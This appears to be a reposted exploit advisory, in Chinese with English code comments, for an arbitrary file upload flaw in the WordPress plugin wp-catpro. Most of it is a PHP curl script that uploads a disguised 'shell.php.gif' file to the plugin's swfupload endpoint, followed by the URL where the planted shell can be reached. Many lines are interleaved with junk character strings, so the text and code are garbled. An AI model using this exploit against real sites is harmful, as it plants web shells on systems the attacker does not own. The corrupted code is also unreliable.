WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
, g/ L+ q% b( U: k7 D* S( x6 E#-----------------------------------------------------------------------

& ?1 O% v9 P4 }7 I作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
9 A2 t: J  g% E/ W下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
  P% c3 p9 @, v3 o: ]/ \####

#=> Exploit 信息:
------------------
  @: S/ A, |! }* z/ w$ \# 攻击者可以上传 file/shell.php.gif
& T3 y$ t% W+ R' ?7 ]9 ]2 Y# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

' r2 X  F7 [5 R8 {" K$ I; r( y#=> Exploit
-----------
<?php
' y. u0 y4 g& {/ {+ _* b$ x
% m3 ~" S. X6 U( t6 e4 W$uploadfile="zik.php.gif";
7 x- W# l  |0 I4 Z+ A* X$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
( Y, p$ z; h" e6 l: w'folder'=>'/wp-content/uploads/catpro/'));
5 u' f: O* \" h2 ecurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- k  F* F' [. g/ X1 b& z$postResult = curl_exec($ch);
curl_close($ch);
) D1 A% M5 [  v7 @; z4 K
print "$postResult";
% ?% t% i; {" L6 q$ V
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
, u3 @  V2 @6 S$ n: A4 T; s# Z  ?>
<?php
( e3 i/ W; @1 q: K% t4 Qphpinfo();
?>